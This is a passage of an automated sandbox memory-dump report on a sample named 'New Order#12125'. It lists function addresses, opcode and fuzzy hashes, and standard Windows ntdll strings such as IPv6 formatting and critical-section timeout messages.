                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 04f34f5b1f6ee4f0b8830eb95e5cb0324cdd7f5dcd55dd11b306c7b96b577592
                                                                        • Instruction ID: 63a377e5d0ba343eb1f21d599b43054ac3f73c1a9cc456334926b02499712354
                                                                        • Opcode Fuzzy Hash: 04f34f5b1f6ee4f0b8830eb95e5cb0324cdd7f5dcd55dd11b306c7b96b577592
                                                                        • Instruction Fuzzy Hash: 12900221242441525685B15984145074046B7E0251799C413B5414D50CC5669956DB21
                                                                        Function 01542DB0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 849a15faad83c167c71fabd149232fe178688ab8227067c73b2a4c19ed7cc66a
                                                                        • Instruction ID: dd937aad6266b58cf8435d7a264c952caa2e3b020e9cd723cfb9f41aa0bc32bf
                                                                        • Opcode Fuzzy Hash: 849a15faad83c167c71fabd149232fe178688ab8227067c73b2a4c19ed7cc66a
                                                                        • Instruction Fuzzy Hash: 5790023124140402D281715984146060049B7D0251F99C413B4424954EC6958B56AF61
                                                                        Function 01542C60 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f14f2d522f43185a49e8b243054d1b4edaa7ca4d7b7dd72ee0b7815447413bd
                                                                        • Instruction ID: 919ebbc65f0c16aedb9814192e0dddaddfbbf4912b08046c50245481cdb0833f
                                                                        • Opcode Fuzzy Hash: 5f14f2d522f43185a49e8b243054d1b4edaa7ca4d7b7dd72ee0b7815447413bd
                                                                        • Instruction Fuzzy Hash: E690023120140842D24071598414B460045A7E0311F59C417B4124A54DC655C9517A21
                                                                        Function 01542CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3bc238817fadb4e1f5fe252d8320e1ceccfa6e216f11027de4cabc3a46e49f5b
                                                                        • Instruction ID: ce7d70abeea654d6ac7186911146e72d0c04c52e7271196ca678807343f527fc
                                                                        • Opcode Fuzzy Hash: 3bc238817fadb4e1f5fe252d8320e1ceccfa6e216f11027de4cabc3a46e49f5b
                                                                        • Instruction Fuzzy Hash: 1290022160540402D280715994287060055A7D0211F59D412B4024954DC6998B556BA1
                                                                        Function 01542CF0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2f13ad6a5a0367e7e87c8182a65b57a7a14ceae245a87ad6aaf5627184ee550
                                                                        • Instruction ID: 8d669efc6af242dc3df7cf13f027945232ae23ae3ed0b98e2ba83e1563eb69df
                                                                        • Opcode Fuzzy Hash: a2f13ad6a5a0367e7e87c8182a65b57a7a14ceae245a87ad6aaf5627184ee550
                                                                        • Instruction Fuzzy Hash: D590023120140403D240715995187070045A7D0211F59D812B4424958DD69689516621
                                                                        Function 01542CA0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ab3028be8e995795b8ad561ac95a698d6b522f87569db0dea0edea80b6cc29b8
                                                                        • Instruction ID: f58125ca386e485354ccdaaa220ca784b782cad3e7f1a289a83331bc151f68af
                                                                        • Opcode Fuzzy Hash: ab3028be8e995795b8ad561ac95a698d6b522f87569db0dea0edea80b6cc29b8
                                                                        • Instruction Fuzzy Hash: 6490023120140402D240759994186460045A7E0311F59D412B9024955EC6A589916631
                                                                        Function 01542F60 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 62a31f300e377a493b97f001b7acd6e89c395148632bdd22c2b05d8ec943a8c6
                                                                        • Instruction ID: ba7faff84e40506d279cdb833f4f7b8e6005dab9bb8a5fafb964f83cf55640a9
                                                                        • Opcode Fuzzy Hash: 62a31f300e377a493b97f001b7acd6e89c395148632bdd22c2b05d8ec943a8c6
                                                                        • Instruction Fuzzy Hash: F890026121140042D244715984147060085A7E1211F59C413B6154954CC5698D615625
                                                                        Function 01542F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 19f6ef417398a7006afa1312cd74c3b8586718fe7010bd9073b70fc5bb7ca5c5
                                                                        • Instruction ID: ed06092828626b855d748ec973d658a309cf0467646cecd3286e5853fb152c56
                                                                        • Opcode Fuzzy Hash: 19f6ef417398a7006afa1312cd74c3b8586718fe7010bd9073b70fc5bb7ca5c5
                                                                        • Instruction Fuzzy Hash: 9E90026134140442D24071598424B060045E7E1311F59C416F5064954DC659CD526626
                                                                        Function 01542FE0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eda500bb7c2ade8748c5ed96984875e28184c764dbfdc500c4d20c57a1f820c8
                                                                        • Instruction ID: bf2bec37b182b82ee06dc3a952cacdc32a78e37d4a2898afef90e9337a893826
                                                                        • Opcode Fuzzy Hash: eda500bb7c2ade8748c5ed96984875e28184c764dbfdc500c4d20c57a1f820c8
                                                                        • Instruction Fuzzy Hash: B3900221211C0042D34075698C24B070045A7D0313F59C516B4154954CC95589615A21
                                                                        Function 01542F90 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ebd2b8ae6e48d9f16589e60571fbfb90a1ccb892de2dbb0f66ff560df8664f0
                                                                        • Instruction ID: 1c69e19fd469b541a75eb209ed163694cba4bd045887f75d0a723a1decb01ae7
                                                                        • Opcode Fuzzy Hash: 3ebd2b8ae6e48d9f16589e60571fbfb90a1ccb892de2dbb0f66ff560df8664f0
                                                                        • Instruction Fuzzy Hash: 4C90023120180402D2407159882470B0045A7D0312F59C412B5164955DC66589516A71
                                                                        Function 01542FB0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98b722d9dfb5d99c892bf2879e0fdbffe1fb14d0c96414dfbc4d0df36bbc353a
                                                                        • Instruction ID: d04b86c0d2b8e2af63cd59c820b7a5f56df41cecc90d2e7f75a5a0c1b23ad23c
                                                                        • Opcode Fuzzy Hash: 98b722d9dfb5d99c892bf2879e0fdbffe1fb14d0c96414dfbc4d0df36bbc353a
                                                                        • Instruction Fuzzy Hash: 749002216014004242807169C8549064045BBE1221759C522B4998950DC59989655B65
                                                                        Function 01542FA0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 679221f1036c0c3287ad622c22a96f6967cbf25beffbd06f49579ed50a32faaa
                                                                        • Instruction ID: 855e1e50a1f4fb666bb540d78617ea921f11570a3c6030eb1551fec613e06e4c
                                                                        • Opcode Fuzzy Hash: 679221f1036c0c3287ad622c22a96f6967cbf25beffbd06f49579ed50a32faaa
                                                                        • Instruction Fuzzy Hash: D790023120180402D240715988187470045A7D0312F59C412B9164955EC6A5C9916A31
                                                                        Function 01542E30 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d76b0674ad3c284022bb736681f78b88947ee11043716f8c47b7149c7c86406e
                                                                        • Instruction ID: d245ae64ce447a13370ba8ce5e36038afdbd7d79570106d73d5e420d1288fb90
                                                                        • Opcode Fuzzy Hash: d76b0674ad3c284022bb736681f78b88947ee11043716f8c47b7149c7c86406e
                                                                        • Instruction Fuzzy Hash: FD90022130140402D242715984246060049E7D1355F99C413F5424955DC6658A53A632
                                                                        Function 01542EE0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2eb2d41f941669d591915ef4b03a6c9794d7954a132ee24ffe907f87ae4cb67a
                                                                        • Instruction ID: 782cf997cfb575823c96aed82f614ee3ec493baa8608a823b38f3a03f49ef07c
                                                                        • Opcode Fuzzy Hash: 2eb2d41f941669d591915ef4b03a6c9794d7954a132ee24ffe907f87ae4cb67a
                                                                        • Instruction Fuzzy Hash: 2790026120180403D280755988146070045A7D0312F59C412B6064955ECA698D516635
                                                                        Function 01542E80 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acc64bad312a32125fc9a85360f6ad4be06630faa58d62aa3a40aabee16e2796
                                                                        • Instruction ID: 644cc72a4db8c0bc4782a9d3603a08ac52591642dac16e3c84b7f6fba96ebebe
                                                                        • Opcode Fuzzy Hash: acc64bad312a32125fc9a85360f6ad4be06630faa58d62aa3a40aabee16e2796
                                                                        • Instruction Fuzzy Hash: CC90022160140502D24171598414616004AA7D0251F99C423B5024955ECA658A92A631
                                                                        Function 01542EA0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e6c614107898637a8583c6c2d912d01a251a458a6237285955010a2d1e201a4
                                                                        • Instruction ID: 32dfada8a84ecb8fcf51d27cc09faabba8dd2820fdf1d37fccdb7dfaba89cb0e
                                                                        • Opcode Fuzzy Hash: 0e6c614107898637a8583c6c2d912d01a251a458a6237285955010a2d1e201a4
                                                                        • Instruction Fuzzy Hash: 5C90027120140402D280715984147460045A7D0311F59C412B9064954EC6998ED56B65
                                                                        Function 01543010 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2712318aee0cfd41e2d74ed086fc6e6c2ebaacf8e1d91e2c541146a1172d4450
                                                                        • Instruction ID: cdb9297c07720d45645f23e0954916ef3b80734592b2a1d57d23fc168e1dc57d
                                                                        • Opcode Fuzzy Hash: 2712318aee0cfd41e2d74ed086fc6e6c2ebaacf8e1d91e2c541146a1172d4450
                                                                        • Instruction Fuzzy Hash: 3F90022120184442D28072598814B0F4145A7E1212F99C41AB8156954CC95589555B21
                                                                        Function 01543090 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2132483b5d1745859e7c7018a3581aa68283569c060d2a7fd8b88d41f60919c9
                                                                        • Instruction ID: 4842190ef1ce1958fc9ccc3e3d2b66fef9f85b1e9e803dd35ebb83435d3e36c9
                                                                        • Opcode Fuzzy Hash: 2132483b5d1745859e7c7018a3581aa68283569c060d2a7fd8b88d41f60919c9
                                                                        • Instruction Fuzzy Hash: F490022124140802D2807159C4247070046E7D0611F59C412B4024954DC6568A656BB1
                                                                        Function 015439B0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa05f07acfd6b283fba76d82e0d74e7997ee7653b7b0cd95456057f1aa93e188
                                                                        • Instruction ID: 44e4a5e487736c5a5d08b8420fa84c7ecd97ad5e631764169bca2287f007b4f6
                                                                        • Opcode Fuzzy Hash: fa05f07acfd6b283fba76d82e0d74e7997ee7653b7b0cd95456057f1aa93e188
                                                                        • Instruction Fuzzy Hash: BE90022124545102D290715D84146164045B7E0211F59C422B4814994DC59589556721
                                                                        Function 01542C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 98f3ab0e92296d0633ccfe9e15438807cfcb48d3e4f35ee388e0ad3d9ede1832
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 01542890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: 92ab81fc0ff4917f6fcf8862cef5c31ee8d7a69a0aea18994f621c0118d08fd6
                                                                        • Instruction ID: 4dcd75a0114a9e363e98229f58de91b5e4940aee305de7cc455471a05d5895b9
                                                                        • Opcode Fuzzy Hash: 92ab81fc0ff4917f6fcf8862cef5c31ee8d7a69a0aea18994f621c0118d08fd6
                                                                        • Instruction Fuzzy Hash: 0051E7B5A00227BFDF11DF9C989097EFBF8BB48244B54852AF565DB641D334DE408BA0
                                                                        Function 015B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: 0aa2953875b10f131aecee28de897bede1b1395165c57cb95985bc963ba87fe1
                                                                        • Instruction ID: 4286f0acb5ac12195842e91bb92dd85f17f3ef9f8fa77b357edcebb5960e44c5
                                                                        • Opcode Fuzzy Hash: 0aa2953875b10f131aecee28de897bede1b1395165c57cb95985bc963ba87fe1
                                                                        • Instruction Fuzzy Hash: 7751E471A00646AECB24DE5DC8D09BFBBF8FB44200F14885AE596DF681E678FA40C770
                                                                        Function 01537630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01574655
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01574787
                                                                        • Execute=1, xrefs: 01574713
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01574742
                                                                        • ExecuteOptions, xrefs: 015746A0
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01574725
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015746FC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 4d96450edfe7a470b4d12b74488c5e09af0dc059fdfe4a27be59a75765241961
                                                                        • Instruction ID: 381019c120061ed26f93a778e1706de2afe14c3886f87e087baeb4ecfe1797c8
                                                                        • Opcode Fuzzy Hash: 4d96450edfe7a470b4d12b74488c5e09af0dc059fdfe4a27be59a75765241961
                                                                        • Instruction Fuzzy Hash: 2C5159B1A4021A7BEF11AAA8EC99FAD77A8FF9C300F14009DD605AF190D7709A41CF50
                                                                        Function 015D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                        • Instruction ID: d7b71a65fb28126cdd89d620da9a15371bc7ec681db1d7000c8d18ff59ea0965
                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                        • Instruction Fuzzy Hash: 7E02E171508342AFD325DF2CC490A6EBBE5FFC8704F44892DBA998B264DB31E945CB52
                                                                        Function 0154B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 2dc06df863816bbfefc17b52885fc03986d940efc79c24fd4ae73c13c6d1eba8
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: 5F81AD70E0524A9FEF29CF6CC8917FEBBB2BF45328F184619D861AF291C634D9418B51
                                                                        Function 015B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: ad19df50108373c5ce5fdfbbb5321be884f110daa7f7cc1623e6894b5d45c867
                                                                        • Instruction ID: 170edd7e483fd7f97bd5215496abd21076c7046be711dd393a62c29114c9b791
                                                                        • Opcode Fuzzy Hash: ad19df50108373c5ce5fdfbbb5321be884f110daa7f7cc1623e6894b5d45c867
                                                                        • Instruction Fuzzy Hash: F521357AA0011AABDB11DF79DC90AEEBBF8FF54654F44011AEA15D7240E730E9068BA1
                                                                        Function 0152F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 0157031E
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015702E7
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015702BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 2adf35cdfe944615e772cba588bdc3bf995b45e1ca01953b1787748144555a0e
                                                                        • Instruction ID: 1c0d1c57090e5e37ae84fff3a9638f860d130f36efb02a0d91e828a36c106165
                                                                        • Opcode Fuzzy Hash: 2adf35cdfe944615e772cba588bdc3bf995b45e1ca01953b1787748144555a0e
                                                                        • Instruction Fuzzy Hash: 6AE1AC326047529FD725CF28E885B2ABBF0BB86714F140A1EF5A58F2E1D774E845CB42
                                                                        Function 0153B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0157728C
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 015772C1
                                                                        • RTL: Resource at %p, xrefs: 015772A3
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01577294
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: cc455f23ba39d96eb29087d19a753dfb024e920d33a994961073b3b1986eaf7c
                                                                        • Instruction ID: f05685a77d969a986725500aced0e60a993ed1aa77d1db3e74616d197eef6246
                                                                        • Opcode Fuzzy Hash: cc455f23ba39d96eb29087d19a753dfb024e920d33a994961073b3b1986eaf7c
                                                                        • Instruction Fuzzy Hash: 8241D231700203ABDB21DE29EC46F6AB7E5FB98715F100A19F965EF240DB31E85287E1
                                                                        Function 015B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: 9dfb0b19505b69eaf0612c8e21290e9fbbf252fb91581cf798ffad894159cbde
                                                                        • Instruction ID: f9d959fcba4f3aa4ebc6e93207f7e8a2975b8bf2bbf886ab0330d9f6d2915bc3
